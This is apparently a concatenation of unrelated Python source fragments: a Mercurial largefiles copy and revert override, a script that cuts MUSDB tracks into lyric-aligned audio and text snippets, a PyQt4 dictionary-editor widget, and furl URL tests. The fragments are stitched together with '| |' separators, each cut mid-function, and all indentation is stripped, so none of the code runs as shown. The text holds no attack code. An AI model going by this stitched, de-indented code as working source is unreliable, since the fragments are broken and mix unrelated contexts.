lfile = lambda f: lfutil.standin(f) in manifest
m._files = [lfutil.standin(f) for f in m._files if lfile(f)]
m._fmap = set(m._files)
m._always = False
origmatchfn = m.matchfn
m.matchfn = lambda f: (lfutil.isstandin(f) and
(f in manifest) and
origmatchfn(lfutil.splitstandin(f)) or
None)
return m
oldmatch = installmatchfn(overridematch)
listpats = []
for pat in pats:
if match_.patkind(pat) is not None:
listpats.append(pat)
else:
listpats.append(makestandin(pat))
try:
origcopyfile = util.copyfile
copiedfiles = []
def overridecopyfile(src, dest):
if (lfutil.shortname in src and
dest.startswith(repo.wjoin(lfutil.shortname))):
destlfile = dest.replace(lfutil.shortname, '')
if not opts['force'] and os.path.exists(destlfile):
raise IOError('',
_('destination largefile already exists'))
copiedfiles.append((src, dest))
origcopyfile(src, dest)
util.copyfile = overridecopyfile
result += orig(ui, repo, listpats, opts, rename)
finally:
util.copyfile = origcopyfile
lfdirstate = lfutil.openlfdirstate(ui, repo)
for (src, dest) in copiedfiles:
if (lfutil.shortname in src and
dest.startswith(repo.wjoin(lfutil.shortname))):
srclfile = src.replace(repo.wjoin(lfutil.standin('')), '')
destlfile = dest.replace(repo.wjoin(lfutil.standin('')), '')
destlfiledir = os.path.dirname(repo.wjoin(destlfile)) or '.'
if not os.path.isdir(destlfiledir):
os.makedirs(destlfiledir)
if rename:
os.rename(repo.wjoin(srclfile), repo.wjoin(destlfile))
lfdirstate.remove(srclfile)
else:
util.copyfile(repo.wjoin(srclfile),
repo.wjoin(destlfile))
lfdirstate.add(destlfile)
lfdirstate.write()
except util.Abort, e:
if str(e) != _('no files to copy'):
raise e
else:
nolfiles = True
finally:
restorematchfn()
wlock.release()
if nolfiles and nonormalfiles:
raise util.Abort(_('no files to copy'))
return result
# When the user calls revert, we have to be careful not to revert any
# changes to other largefiles accidentally. This means we have to keep
# track of the largefiles that are being reverted so we only pull down
# the necessary largefiles.
#
# Standins are only updated (to match the hash of largefiles) before
# commits. Update the standins then run the original revert, changing
# the matcher to hit standins instead of largefiles. Based on the
# resulting standins update the largefiles. Then return the standins
# to their proper state.
def overriderevert(orig, ui, repo, *pats, **opts):
# Because we put the standins in a bad state (by updating them)
# and then return them to a correct state we need to lock to
# prevent others from changing them in their incorrect state.
wlock = repo.wlock()
try:
lfdirstate = lfutil.openlfdirstate(ui, repo)
(modified, added, removed, missing, unknown, ignored, clean) = \
lfutil.lfdirstatestatus(lfdirstate, repo, repo['.'].rev())
lfdirstate.write()
for lfile in modified:
lfutil.updatestandin(repo, lfutil.standin(lfile))
for lfile in missing:
if (os.path.exists(repo.wjoin(lfutil.standin(lfile)))):
os.unlink(repo.wjoin(lfutil.standin(lfile)))
try:
ctx = scmutil.revsingle(repo, opts.get('rev'))
oldmatch = None # for the closure
| |
<filename>03_preprocessing_musdb_audio_txt_char.py
"""
This script reads the MUSDB lyrics annotation files, cuts the audio
into snippets according to the annotated lines, and saves audio and
text files accordingly (both as torch files).
Please note that when this file was written, the vocals category
annotations were done with different letters than in the publicly
available version of the MUSDB lyrics. The categories translate as
follows: a-->n, b-->s, c-->d, d-->x (public format --> old format).
This script can be used with the a, b, c, d annotation style, but the
annotations will be translated to the old format; the folder structure
and the other scripts use the old format as well.
"""
import musdb
import librosa as lb
import torch
import os
import pickle
import yaml
# ignore warning about unsafe loaders in pyYAML 5.1 (used in musdb)
# https://github.com/yaml/pyyaml/wiki/PyYAML-yaml.load(input)-Deprecation
yaml.warnings({'YAMLLoadWarning': False})
path_to_musdb = '../Datasets/MUSDB18'
path_to_train_lyrics = '../Datasets/MUSDB_w_lyrics/lyrics_transcripts/train'
path_to_test_lyrics = '../Datasets/MUSDB_w_lyrics/lyrics_transcripts/test'
pickle_in = open('dicts/char2idx.pickle', 'rb')
char2idx = pickle.load(pickle_in)
target_sr = 16000
path_to_save_data = '../Datasets/MUSDB_w_lyrics'
# ------------------------------------------------------------------------------------------------------------------
# make folder structure
path = os.path.join(path_to_save_data, 'test', 'text')
if not os.path.isdir(path):
os.makedirs(path, exist_ok=True)
for stem in ['vocals', 'mix', 'accompaniments']:
for type in ['n', 'x', 's', 'd']:
path = os.path.join(path_to_save_data, 'test', 'audio', stem, type)
if not os.path.isdir(path):
os.makedirs(path, exist_ok=True)
path = os.path.join(path_to_save_data, 'val', 'text')
if not os.path.isdir(path):
os.makedirs(path, exist_ok=True)
for stem in ['vocals', 'mix']:
for type in ['n', 'x', 's', 'd']:
path = os.path.join(path_to_save_data, 'val', 'audio', stem, type)
if not os.path.isdir(path):
os.makedirs(path, exist_ok=True)
path = os.path.join(path_to_save_data, 'train', 'text')
if not os.path.isdir(path):
os.makedirs(path, exist_ok=True)
for stem in ['vocals', 'accompaniment', 'drums', 'bass', 'other']:
for type in ['n', 'x', 's', 'd']:
path = os.path.join(path_to_save_data, 'train', 'audio', stem, type)
if not os.path.isdir(path):
os.makedirs(path, exist_ok=True)
os.makedirs(os.path.join(path_to_save_data, 'train', 'audio', 'drums_12s'), exist_ok=True)
os.makedirs(os.path.join(path_to_save_data, 'train', 'audio', 'bass_12s'), exist_ok=True)
os.makedirs(os.path.join(path_to_save_data, 'train', 'audio', 'other_12s'), exist_ok=True)
os.makedirs(os.path.join(path_to_save_data, 'train', 'audio', 'accompaniment_12s'), exist_ok=True)
# ------------------------------------------------------------------------------------------------------------------
musdb_corpus = musdb.DB(path_to_musdb)
training_tracks = musdb_corpus.load_mus_tracks(subsets=['train'])
test_tracks = musdb_corpus.load_mus_tracks(subsets=['test'])
# validation set as in Open-Unmix, but non-English tracks are replaced by another track from the same artist:
# replaced Fergessen - Nos Palpitants by Fergessen - The Wind
# replaced Meaxic - Take A Step by Meaxic - You Listen
validation_tracks = ['Actions - One Minute Smile',
'<NAME> - Waltz For My Victims',
'<NAME> - Promises & Lies',
'<NAME> - A Reason To Leave',
'Triviul - Angelsaint',
'<NAME> - Goodbye Bolero',
'Fergessen - The Wind',
'Leaf - Summerghost',
'Skelpolu - Human Mistakes',
'<NAME> - Pennies',
'ANiMAL - Rockshow',
'<NAME> - On The Line',
'Meaxic - You Listen',
'Traffic Experiment - Sirens']
# -----------------------------------------------------------------------------------------------------------------
# process MUSDB training partition and make training and validation files
train_files_n = []
train_files_s = []
train_files_d = []
train_files_x = []
val_files_n = []
val_files_s = []
val_files_d = []
val_files_x = []
train_accompaniment_12s = []
train_bass_12s = []
train_drums_12s = []
train_other_12s = []
snippet_type_conversion = {'a': 'n', 'b': 's', 'c': 'd', 'd': 'x'}
for track in training_tracks:
track_name = track.name
# make file name for audio and text files of current track
file_name = track.name.split('-')
file_name = file_name[0][0:6] + "_" + file_name[1][1:6]
file_name = file_name.replace(" ", "_")
# make boolean indicating whether current track is in validation set
val_set_track = track_name in validation_tracks
# -----------------------------------------------------------------------------------------------------------------
# generate 12 s long snippets of the accompaniment, drums, bass, and other stems for all tracks in the training partition
if not val_set_track:
for target in ['accompaniment', 'drums', 'bass', 'other']:
accompaniment_audio = track.targets[target].audio
accompaniment_audio_resampled = lb.core.resample(accompaniment_audio.T, track.rate, target_sr)
acc_snippets = lb.util.frame(accompaniment_audio_resampled, frame_length=12 * target_sr,
hop_length=12 * target_sr)
number_of_snippets = acc_snippets.shape[-1]
for counter in range(number_of_snippets):
# audio_torch has shape (2, ???) = (channels, samples)
audio_torch = torch.tensor(acc_snippets[:, :, counter]).type(torch.float32)
torch.save(audio_torch, os.path.join(path_to_save_data, 'train', 'audio', '{}_12s'.format(target),
file_name + '_{}.pt'.format(counter)))
if target == 'accompaniment':
train_accompaniment_12s.append(file_name + '_{}.pt'.format(counter))
elif target == 'drums':
train_drums_12s.append(file_name + '_{}.pt'.format(counter))
elif target == 'bass':
train_bass_12s.append(file_name + '_{}.pt'.format(counter))
elif target == 'other':
train_other_12s.append(file_name + '_{}.pt'.format(counter))
# -----------------------------------------------------------------------------------------------------------------
path_to_track_lyrics = os.path.join(path_to_train_lyrics, track_name + '.txt')
# ignore files without lyrics annotations
if not os.path.isfile(path_to_track_lyrics):
print("No lyrics for", track, ", it was skipped")
continue
lyrics_file = open(path_to_track_lyrics)
lyrics_lines = lyrics_file.readlines()
vocals_audio = track.targets['vocals'].audio
if val_set_track:
other_audio = track.audio
# resample
acc_audio_resampled = lb.core.resample(other_audio.T, track.rate, target_sr)
vocals_audio_resampled = lb.core.resample(vocals_audio.T, track.rate, target_sr)
# go through lyrics lines and split audio as annotated
for counter, line in enumerate(lyrics_lines):
# ignore rejected lines
if line[0] == '*':
continue
annotations = line.split(' ', maxsplit=3)
start_m = int(annotations[0].split(':')[0]) # start time minutes
start_s = int(annotations[0].split(':')[1]) # start time seconds
start_time = start_m * 60 + start_s # start time in seconds
end_m = int(annotations[1].split(':')[0]) # end time minutes
end_s = int(annotations[1].split(':')[1]) # end time seconds
end_time = end_m * 60 + end_s # end time in seconds
acc_audio_snippet = acc_audio_resampled[:, start_time * target_sr: end_time * target_sr]
vocals_audio_snippet = vocals_audio_resampled[:, start_time * target_sr: end_time * target_sr]
acc_audio_snippet_torch = torch.tensor(acc_audio_snippet).type(torch.float32)
vocals_audio_snippet_torch = torch.tensor(vocals_audio_snippet).type(torch.float32)
snippet_type = annotations[2] # a, b, c, d
snippet_type = snippet_type_conversion[snippet_type] # change to old format n, s, d, x
text = annotations[3].replace('\n', '').replace(' ', '>')
text_idx = torch.tensor([char2idx[char] for char in text]).type(torch.float32)
snippet_file_name = file_name + '_{}'.format(counter)
partition = 'val'
other = 'mix'
# save audio
path_to_save_vocals = os.path.join(path_to_save_data, partition, 'audio', 'vocals', snippet_type,
snippet_file_name)
path_to_save_other = os.path.join(path_to_save_data, partition, 'audio', other, snippet_type,
snippet_file_name)
torch.save(acc_audio_snippet_torch, path_to_save_other + '.pt')
torch.save(vocals_audio_snippet_torch, path_to_save_vocals + '.pt')
# save text
path_to_save_text = os.path.join(path_to_save_data, partition, 'text', snippet_file_name + '.txt')
path_to_save_text_idx = os.path.join(path_to_save_data, partition, 'text', snippet_file_name + '.pt')
with open(path_to_save_text, 'w') as txt_file:
txt_file.write(text)
txt_file.close()
torch.save(text_idx, path_to_save_text_idx)
if snippet_type == 'n':
val_files_n.append('n/{}'.format(snippet_file_name))
if snippet_type == 'x':
val_files_x.append('x/{}'.format(snippet_file_name))
if snippet_type == 's':
val_files_s.append('s/{}'.format(snippet_file_name))
if snippet_type == 'd':
val_files_d.append('d/{}'.format(snippet_file_name))
# process training songs
else:
acc_audio = track.targets['accompaniment'].audio
drums_audio = track.targets['drums'].audio
bass_audio = track.targets['bass'].audio
other_audio = track.targets['other'].audio
# resample
vocals_audio_resampled = lb.core.resample(vocals_audio.T, track.rate, target_sr)
acc_audio_resampled = lb.core.resample(acc_audio.T, track.rate, target_sr)
drums_audio_resampled = lb.core.resample(drums_audio.T, track.rate, target_sr)
bass_audio_resampled = lb.core.resample(bass_audio.T, track.rate, target_sr)
other_audio_resampled = lb.core.resample(other_audio.T, track.rate, target_sr)
# go through lyrics lines and split audio as annotated
for counter, line in enumerate(lyrics_lines):
# ignore rejected lines
if line[0] == '*':
continue
annotations = line.split(' ', maxsplit=3)
start_m = int(annotations[0].split(':')[0]) # start time minutes
start_s = int(annotations[0].split(':')[1]) # start time seconds
start_time = start_m * 60 + start_s # start time in seconds
end_m = int(annotations[1].split(':')[0]) # end time minutes
end_s = int(annotations[1].split(':')[1]) # end time seconds
end_time = end_m * 60 + end_s # end time in seconds
acc_audio_snippet = acc_audio_resampled[:, start_time * target_sr: end_time * target_sr]
vocals_audio_snippet = vocals_audio_resampled[:, start_time * target_sr: end_time * target_sr]
drums_audio_snippet = drums_audio_resampled[:, start_time * target_sr: end_time * target_sr]
bass_audio_snippet = bass_audio_resampled[:, start_time * target_sr: end_time * target_sr]
other_audio_snippet = other_audio_resampled[:, start_time * target_sr: end_time * target_sr]
acc_audio_snippet_torch = torch.tensor(acc_audio_snippet).type(torch.float32)
vocals_audio_snippet_torch = torch.tensor(vocals_audio_snippet).type(torch.float32)
drums_audio_snippet_torch = torch.tensor(drums_audio_snippet).type(torch.float32)
bass_audio_snippet_torch = torch.tensor(bass_audio_snippet).type(torch.float32)
other_audio_snippet_torch = torch.tensor(other_audio_snippet).type(torch.float32)
snippet_type = annotations[2] # a, b, c, d
snippet_type = snippet_type_conversion[snippet_type] # change to old format n, s, d, x
text = annotations[3].replace('\n', '').replace(' ', '>')
text_idx = torch.tensor([char2idx[char] for char in text]).type(torch.float32)
snippet_file_name = file_name + '_{}'.format(counter)
partition = 'train'
other = 'accompaniments'
# save audio
path_to_save_vocals = os.path.join(path_to_save_data, partition, 'audio', 'vocals', snippet_type,
snippet_file_name)
path_to_save_acc = os.path.join(path_to_save_data, partition, 'audio', 'accompaniment', snippet_type,
snippet_file_name)
path_to_save_drums = os.path.join(path_to_save_data, partition, 'audio', 'drums', snippet_type,
snippet_file_name)
path_to_save_bass = os.path.join(path_to_save_data, partition, 'audio', 'bass', snippet_type,
snippet_file_name)
path_to_save_other = os.path.join(path_to_save_data, partition, 'audio', 'other', snippet_type,
snippet_file_name)
torch.save(acc_audio_snippet_torch, path_to_save_acc + '.pt')
torch.save(vocals_audio_snippet_torch, path_to_save_vocals + '.pt')
torch.save(drums_audio_snippet_torch, path_to_save_drums + '.pt')
torch.save(bass_audio_snippet_torch, path_to_save_bass + '.pt')
torch.save(other_audio_snippet_torch, path_to_save_other + '.pt')
# save text
path_to_save_text = os.path.join(path_to_save_data, partition, 'text', snippet_file_name + '.txt')
path_to_save_text_idx = os.path.join(path_to_save_data, partition, 'text', snippet_file_name + '.pt')
with open(path_to_save_text, 'w') as txt_file:
txt_file.write(text)
txt_file.close()
torch.save(text_idx, path_to_save_text_idx)
if snippet_type == 'n':
train_files_n.append('n/{}'.format(snippet_file_name))
if snippet_type == 'x':
train_files_x.append('x/{}'.format(snippet_file_name))
if snippet_type == 's':
train_files_s.append('s/{}'.format(snippet_file_name))
if snippet_type == 'd':
train_files_d.append('d/{}'.format(snippet_file_name))
# save lists with file names
pickle_out = open(os.path.join(path_to_save_data, "val", "val_files_n.pickle"), "wb")
pickle.dump(val_files_n, pickle_out)
pickle_out.close()
pickle_out = open(os.path.join(path_to_save_data, "val", "val_files_x.pickle"), "wb")
pickle.dump(val_files_x, pickle_out)
pickle_out.close()
pickle_out = open(os.path.join(path_to_save_data, "val", "val_files_s.pickle"), "wb")
pickle.dump(val_files_s, pickle_out)
pickle_out.close()
pickle_out = open(os.path.join(path_to_save_data, "val", "val_files_d.pickle"), "wb")
pickle.dump(val_files_d, pickle_out)
pickle_out.close()
pickle_out = open(os.path.join(path_to_save_data, "train", "train_files_n.pickle"), "wb")
pickle.dump(train_files_n, pickle_out)
pickle_out.close()
pickle_out = open(os.path.join(path_to_save_data, "train", "train_files_x.pickle"), "wb")
pickle.dump(train_files_x, pickle_out)
pickle_out.close()
pickle_out = open(os.path.join(path_to_save_data, "train", "train_files_s.pickle"), "wb")
pickle.dump(train_files_s, pickle_out)
pickle_out.close()
pickle_out = open(os.path.join(path_to_save_data, "train", "train_files_d.pickle"), "wb")
pickle.dump(train_files_d, pickle_out)
pickle_out.close()
pickle_out = open(os.path.join(path_to_save_data, "train", "train_accompaniments_12s.pickle"), "wb")
pickle.dump(train_accompaniment_12s, pickle_out)
pickle_out.close()
pickle_out = open(os.path.join(path_to_save_data, "train", "train_drums_12s.pickle"), "wb")
pickle.dump(train_drums_12s, pickle_out)
pickle_out.close()
pickle_out = open(os.path.join(path_to_save_data, "train", "train_bass_12s.pickle"), "wb")
pickle.dump(train_bass_12s, pickle_out)
pickle_out.close()
pickle_out = open(os.path.join(path_to_save_data, "train", "train_other_12s.pickle"), "wb")
pickle.dump(train_other_12s, pickle_out)
pickle_out.close()
print("Train files n:", train_files_n)
print("Train files x:", train_files_x)
print("Train files s:", train_files_s)
print("Train files d:", train_files_d)
print("Val files n:", val_files_n)
print("Val files x:", val_files_x)
print("Val files s:", val_files_s)
print("Val files d:", val_files_d)
print("Train accompaniments 12s:", train_accompaniment_12s)
# -----------------------------------------------------------------------------------------------------------------
# process MUSDB test partition and make test files
test_files_n = []
test_files_s = | |
<gh_stars>0
# -*- coding: utf-8 -*-
#
# Copyright © 2009 <NAME>
# Licensed under the terms of the MIT License
# (see pydeelib/__init__.py for details)
"""
Dictionary Editor Widget and Dialog based on PyQt4
"""
#TODO: Multiple selection: open as many editors (array/dict/...) as necessary,
# at the same time
# pylint: disable-msg=C0103
# pylint: disable-msg=R0903
# pylint: disable-msg=R0911
# pylint: disable-msg=R0201
import re
from PyQt4.QtCore import (Qt, QVariant, QModelIndex, QAbstractTableModel,
SIGNAL, SLOT, QDateTime)
from PyQt4.QtGui import (QMessageBox, QTableView, QItemDelegate, QLineEdit,
QVBoxLayout, QWidget, QColor, QDialog, QDateEdit,
QDialogButtonBox, QMenu, QInputDialog, QDateTimeEdit,
QApplication, QKeySequence)
# Local import
from pydeelib.config import get_icon, get_font
from pydeelib.qthelpers import translate, add_actions, create_action
from pydeelib.widgets.texteditor import TextEditor
from pydeelib.widgets.importwizard import ImportWizard
#----Numpy arrays support
class FakeObject(object):
"""Fake class used in replacement of missing modules"""
pass
try:
from numpy import ndarray
from pydeelib.widgets.arrayeditor import ArrayEditor
except ImportError:
class ndarray(FakeObject):
"""Fake ndarray"""
pass
#----Misc.
def address(obj):
"""Return object address as a string: '<classname @ address>'"""
return "<%s @ %s>" % (obj.__class__.__name__,
hex(id(obj)).upper().replace('X','x'))
#----date and datetime objects support
import datetime
try:
from dateutil.parser import parse as dateparse
except ImportError:
from string import atoi
def dateparse(datestr):
"""Just for 'year, month, day' strings"""
return datetime.datetime( *map(atoi, datestr.split(',')) )
def datestr_to_datetime(value):
rp = value.rfind('(')+1
return dateparse(value[rp:-1])
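# Illustrative example (added; not in the original module):
#   datestr_to_datetime("datetime.date(2010, 5, 1)")
# keeps the text after the last '(' ("2010, 5, 1"), drops the trailing ')',
# and parses it, giving datetime.datetime(2010, 5, 1, 0, 0).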
#----Background colors for supported types
COLORS = {
bool: Qt.magenta,
(int, float, long): Qt.blue,
list: Qt.yellow,
dict: Qt.cyan,
tuple: Qt.lightGray,
(str, unicode): Qt.darkRed,
ndarray: Qt.green,
datetime.date: Qt.darkYellow,
}
def get_color(value, alpha=.2):
"""Return color depending on value type"""
color = QColor()
for typ in COLORS:
if isinstance(value, typ):
color = QColor(COLORS[typ])
color.setAlphaF(alpha)
return color
#----Sorting
def sort_against(lista, listb, reverse=False):
"""Arrange lista items in the same order as sorted(listb)"""
return [item for _, item in sorted(zip(listb, lista), reverse=reverse)]
def unsorted_unique(lista):
"""Removes duplicates from lista neglecting its initial ordering"""
set = {}
map(set.__setitem__,lista,[])
return set.keys()
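# Illustrative examples (added; not in the original module):
#   sort_against(['a', 'b', 'c'], [3, 1, 2]) -> ['b', 'c', 'a']
#   sorted(unsorted_unique([2, 1, 2, 3]))    -> [1, 2, 3]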
#----Display <--> Value
def value_to_display(value, truncate=False,
trunc_len=80, minmax=False, collvalue=True):
"""Convert value for display purpose"""
if minmax and isinstance(value, ndarray):
if value.size == 0:
return repr(value)
try:
return 'Min: %r\nMax: %r' % (value.min(), value.max())
except TypeError:
pass
if not isinstance(value, (str, unicode)):
if isinstance(value, (list, tuple, dict, set)) and not collvalue:
value = address(value)
else:
value = repr(value)
if truncate and len(value) > trunc_len:
value = value[:trunc_len].rstrip() + ' ...'
return value
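# Illustrative examples (added; not in the original module):
#   value_to_display([1, 2, 3])                -> '[1, 2, 3]'
#   value_to_display('x' * 100, truncate=True) -> first 80 chars + ' ...'
#   value_to_display([1, 2], collvalue=False)  -> '<list @ 0x...>' (see address())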
def try_to_eval(value):
"""Try to eval value"""
try:
return eval(value)
except (NameError, SyntaxError, ImportError):
return value
def display_to_value(value, default_value):
"""Convert back to value"""
value = unicode(value.toString())
try:
if isinstance(default_value, str):
value = str(value)
elif isinstance(default_value, (bool, list, dict, tuple)):
value = eval(value)
elif isinstance(default_value, float):
value = float(value)
elif isinstance(default_value, int):
value = int(value)
elif isinstance(default_value, datetime.datetime):
value = datestr_to_datetime(value)
elif isinstance(default_value, datetime.date):
value = datestr_to_datetime(value).date()
else:
value = try_to_eval(value)
except (ValueError, SyntaxError):
value = try_to_eval(value)
return value
def get_size(item):
"""Return size of an item of arbitrary type"""
if isinstance(item, (list, tuple, dict)):
return len(item)
elif isinstance(item, ndarray):
return item.shape
else:
return 1
def get_type(item):
"""Return type of an item"""
found = re.findall(r"<type '([\S]*)'>", str(type(item)))
text = unicode(translate('DictEditor', 'unknown')) \
if not found else found[0]
if isinstance(item, ndarray):
text = item.dtype.name
return text[text.find('.')+1:]
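# Illustrative examples (added; not in the original module):
#   get_type(1)                     -> 'int'
#   get_type(datetime.date.today()) -> 'date'   (module prefix stripped)
#   get_type(some_ndarray)          -> its dtype name, e.g. 'float64'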
class ReadOnlyDictModel(QAbstractTableModel):
"""DictEditor Read-Only Table Model"""
def __init__(self, parent, data, title="", names=False,
truncate=True, minmax=False, collvalue=True, remote=False):
QAbstractTableModel.__init__(self, parent)
if data is None:
data = {}
self.names = names
self.truncate = truncate
self.minmax = minmax
self.collvalue = collvalue
self.remote = remote
self.header0 = None
self._data = None
self.showndata = None
self.keys = None
self.title = unicode(title) # in case title is not a string
if self.title:
self.title = self.title + ' - '
self.sizes = None
self.types = None
self.set_data(data)
def get_data(self):
"""Return model data"""
return self._data
def set_data(self, data, dictfilter=None):
"""Set model data"""
self._data = data
if dictfilter is not None and not self.remote:
data = dictfilter(data)
self.showndata = data
self.header0 = translate("DictEditor", "Index")
if self.names:
self.header0 = translate("DictEditor", "Name")
if isinstance(data, tuple):
self.keys = range(len(data))
self.title += translate("DictEditor", "Tuple")
elif isinstance(data, list):
self.keys = range(len(data))
self.title += translate("DictEditor", "List")
elif isinstance(data, dict):
self.keys = data.keys()
self.title += translate("DictEditor", "Dictionary")
if not self.names:
self.header0 = translate("DictEditor", "Key")
else:
raise RuntimeError("Invalid data type")
self.title += ' ('+str(len(self.keys))+' '+ \
translate("DictEditor", "elements")+')'
if self.remote:
self.sizes = [ data[self.keys[index]]['size']
for index in range(len(self.keys)) ]
self.types = [ data[self.keys[index]]['type']
for index in range(len(self.keys)) ]
else:
self.sizes = [ get_size(data[self.keys[index]])
for index in range(len(self.keys)) ]
self.types = [ get_type(data[self.keys[index]])
for index in range(len(self.keys)) ]
self.reset()
def sort(self, column, order=Qt.AscendingOrder):
"""Overriding sort method"""
reverse = (order==Qt.DescendingOrder)
if column == 0:
self.sizes = sort_against(self.sizes, self.keys, reverse)
self.types = sort_against(self.types, self.keys, reverse)
self.keys.sort(reverse=reverse)
elif column == 1:
self.keys = sort_against(self.keys, self.types, reverse)
self.sizes = sort_against(self.sizes, self.types, reverse)
self.types.sort(reverse=reverse)
elif column == 2:
self.keys = sort_against(self.keys, self.sizes, reverse)
self.types = sort_against(self.types, self.sizes, reverse)
self.sizes.sort(reverse=reverse)
elif column == 3:
self.keys = sort_against(self.keys, self.sizes, reverse)
self.types = sort_against(self.types, self.sizes, reverse)
self.sizes.sort(reverse=reverse)
elif column == 4:
values = [self._data[key] for key in self.keys]
self.keys = sort_against(self.keys, values, reverse)
self.sizes = sort_against(self.sizes, values, reverse)
self.types = sort_against(self.types, values, reverse)
self.reset()
def columnCount(self, qindex=QModelIndex()):
"""Array column number"""
return 4
def rowCount(self, qindex=QModelIndex()):
"""Array row number"""
return len(self.keys)
def get_key(self, index):
"""Return current key"""
return self.keys[index.row()]
def get_value(self, index):
"""Return current value"""
if index.column() == 0:
return self.keys[ index.row() ]
elif index.column() == 1:
return self.types[ index.row() ]
elif index.column() == 2:
return self.sizes[ index.row() ]
else:
return self._data[ self.keys[index.row()] ]
def get_bgcolor(self, index):
"""Background color depending on value"""
if index.column() == 0:
color = QColor(Qt.lightGray)
color.setAlphaF(.05)
elif index.column() < 3:
color = QColor(Qt.lightGray)
color.setAlphaF(.2)
else:
color = QColor(Qt.lightGray)
color.setAlphaF(.3)
return color
def data(self, index, role=Qt.DisplayRole):
"""Cell content"""
if not index.isValid():
return QVariant()
value = self.get_value(index)
if index.column() == 3 and self.remote:
value = value['view']
display = value_to_display(value,
truncate=index.column() == 3 and self.truncate,
minmax=self.minmax,
collvalue=self.collvalue or index.column() != 3)
if role == Qt.DisplayRole:
return QVariant(display)
elif role == Qt.EditRole:
return QVariant(value_to_display(value))
elif role == Qt.TextAlignmentRole:
if index.column() == 3:
if len(display.splitlines()) < 3:
return QVariant(int(Qt.AlignLeft|Qt.AlignVCenter))
else:
return QVariant(int(Qt.AlignLeft|Qt.AlignTop))
else:
return QVariant(int(Qt.AlignLeft|Qt.AlignVCenter))
elif role == Qt.BackgroundColorRole:
return QVariant( self.get_bgcolor(index) )
elif role == Qt.FontRole:
if index.column() < 3:
return QVariant(get_font('dicteditor_header'))
else:
return QVariant(get_font('dicteditor'))
return QVariant()
def headerData(self, section, orientation, role=Qt.DisplayRole):
"""Overriding method headerData"""
if role != Qt.DisplayRole:
if role == Qt.FontRole:
return QVariant(get_font('dicteditor_header'))
else:
return QVariant()
i_column = int(section)
if orientation == Qt.Horizontal:
headers = (self.header0,
translate("DictEditor", "Type"),
translate("DictEditor", "Size"),
translate("DictEditor", "Value"))
return QVariant( headers[i_column] )
else:
return QVariant()
def flags(self, index):
"""Overriding method flags"""
# This method was implemented in DictModel only, but to enable tuple
# exploration (even without editing), this method was moved here
if not index.isValid():
return Qt.ItemIsEnabled
return Qt.ItemFlags(QAbstractTableModel.flags(self, index)|
Qt.ItemIsEditable)
class DictModel(ReadOnlyDictModel):
"""DictEditor Table Model"""
def set_value(self, index, value):
"""Set value"""
self._data[ self.keys[index.row()] ] = value
self.showndata[ self.keys[index.row()] ] = value
self.sizes[index.row()] = get_size(value)
self.types[index.row()] = get_type(value)
def get_bgcolor(self, index):
"""Background color depending on value"""
value = self.get_value(index)
if index.column()<3:
color = ReadOnlyDictModel.get_bgcolor(self, index)
else:
if self.remote:
color = value['color']
else:
color = get_color(value)
return color
def setData(self, index, value, role=Qt.EditRole):
"""Cell content change"""
if not index.isValid():
return False
if index.column()<3:
return False
value = display_to_value( value, self.get_value(index) )
self.set_value(index, value)
self.emit(SIGNAL("dataChanged(QModelIndex,QModelIndex)"),
index, index)
return True
class DictDelegate(QItemDelegate):
"""DictEditor Item Delegate"""
def __init__(self, parent=None, inplace=False):
QItemDelegate.__init__(self, parent)
self.inplace = inplace
def get_value(self, index):
return index.model().get_value(index)
def set_value(self, index, value):
index.model().set_value(index, value)
def createEditor(self, parent, option, index):
"""Overriding method createEditor"""
if index.column()<3:
return None
value = self.get_value(index)
key = index.model().get_key(index)
readonly = isinstance(value, tuple) or self.parent().readonly
#---editor = DictEditor
if isinstance(value, (list, tuple, dict)) and not self.inplace:
editor = DictEditor(value, key, icon=self.parent().windowIcon(),
readonly=readonly)
if editor.exec_() and not readonly:
self.set_value(index, editor.get_copy())
return None
#---editor = ArrayEditor
elif isinstance(value, ndarray) and ndarray is not FakeObject \
and not self.inplace:
if value.size == 0:
return None
editor = ArrayEditor(value, title=key, readonly=readonly)
if editor.exec_():
# Only necessary for child class RemoteDictDelegate:
# (ArrayEditor does not make a copy of value)
self.set_value(index, value)
return None
#---editor = QDateTimeEdit
elif isinstance(value, datetime.datetime) and not self.inplace:
editor = QDateTimeEdit(value, parent)
editor.setCalendarPopup(True)
editor.setFont(get_font('dicteditor'))
self.connect(editor, SIGNAL("returnPressed()"),
self.commitAndCloseEditor)
return editor
#---editor = QDateEdit
elif isinstance(value, datetime.date) and not self.inplace:
editor = QDateEdit(value, parent)
editor.setCalendarPopup(True)
editor.setFont(get_font('dicteditor'))
self.connect(editor, SIGNAL("returnPressed()"),
self.commitAndCloseEditor)
return | |
== furl.furl(f).url == furl.furl(f.url).url
assert f is not f.copy() and f.url == f.copy().url
# URL paths are optionally absolute if scheme and netloc are
# empty.
f = furl.furl()
f.path.segments = ['pumps']
assert str(f.path) == 'pumps'
f.path = 'pumps'
assert str(f.path) == 'pumps'
# Fragment paths are optionally absolute, and not absolute by
# default.
f = furl.furl()
f.fragment.path.segments = ['pumps']
assert str(f.fragment.path) == 'pumps'
f.fragment.path = 'pumps'
assert str(f.fragment.path) == 'pumps'
# URLs comprised of a netloc string only should not be prefixed
# with '//', as is the default behavior of
# urlparse.urlunsplit().
f = furl.furl()
assert f.set(host='foo').url == 'foo'
assert f.set(host='pumps.com').url == 'pumps.com'
assert f.set(host='pumps.com', port=88).url == 'pumps.com:88'
assert f.set(netloc='pumps.com:88').url == 'pumps.com:88'
def test_basic_manipulation(self):
f = furl.furl('http://www.pumps.com/')
f.args.setdefault('foo', 'blah')
assert str(f) == 'http://www.pumps.com/?foo=blah'
f.query.params['foo'] = 'eep'
assert str(f) == 'http://www.pumps.com/?foo=eep'
f.port = 99
assert str(f) == 'http://www.pumps.com:99/?foo=eep'
f.netloc = 'www.yahoo.com:220'
assert str(f) == 'http://www.yahoo.com:220/?foo=eep'
f.netloc = 'www.yahoo.com'
assert f.port == 80
assert str(f) == 'http://www.yahoo.com/?foo=eep'
f.scheme = 'sup'
assert str(f) == 'sup://www.yahoo.com:80/?foo=eep'
f.port = None
assert str(f) == 'sup://www.yahoo.com/?foo=eep'
f.fragment = 'sup'
assert str(f) == 'sup://www.yahoo.com/?foo=eep#sup'
f.path = 'hay supppp'
assert str(f) == 'sup://www.yahoo.com/hay%20supppp?foo=eep#sup'
f.args['space'] = '1 2'
assert str(
f) == 'sup://www.yahoo.com/hay%20supppp?foo=eep&space=1+2#sup'
del f.args['foo']
assert str(f) == 'sup://www.yahoo.com/hay%20supppp?space=1+2#sup'
f.host = 'ohay.com'
assert str(f) == 'sup://ohay.com/hay%20supppp?space=1+2#sup'
